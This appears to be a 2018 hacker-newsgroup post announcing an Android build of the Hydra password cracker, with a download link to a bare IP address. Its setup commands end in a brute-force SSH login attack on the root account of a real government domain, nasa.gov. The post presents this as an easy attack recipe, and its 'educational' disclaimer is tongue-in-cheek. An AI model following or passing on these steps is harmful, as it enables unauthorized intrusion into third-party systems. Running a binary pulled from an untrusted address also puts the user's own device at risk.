Subject: Hacking SSH made easy: hydra-for-android
From: system@localhost.localdomain
Date: 25/10/2018, 01:45
Newsgroups: alt.2600.hackers,alt.hack,alt.paranet.ufo

thc-hydra-8.7d-arm7-binary and libs ssl, ssh, and crypto, port by magizian
aka. hydra-for-android

download:

http://75.61.90.157/~god/hydra-for-android.tar.gz

instructions:

1. install some kind of terminal emulator .apk
( I recommend com.magicandroidapps.bettertermpro.apk
)

2. copy  hydra binary from sdcard to bin directory and chmod.
( ie..
cp /sdcard/Download/bin/hydra /data/data/com.magicandroidapps.bettertermpro/bin/hydra

chmod 777 /data/data/com.magicandroidapps.bettertermpro/bin/hydra
)

3. copy lib files from from sdcard to lib directory and chmod.
( but if it isn't writable, just make another lib directory and export append LD_LIBRARY_PATH
ie..
mkdir /data/data/com.magicandroidapps.bettertermpro/lib2

cp /sdcard/Download/lib/* /data/data/com.magicandroidapps.bettertermpro/lib2/*

chmod 777 /data/data/com.magicandroidapps.bettertermpro/lib2/*

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/data/data/com.magicandroidapps.bettertermpro/lib2
)

4. create passwordlist
(
sh /sdcard/Download/wordlist.sh >> /sdcard/wordlist.txt

5. run hydra
( ie..
hydra -l root -P /sdcard/wordlist.txt -t 2 -T 64 -f nasa.gov
)

This port/release is for educational and entertainment purposes only,... [o;-)

hydra is work and copyright of THC (sorta).
great work!

[o;-)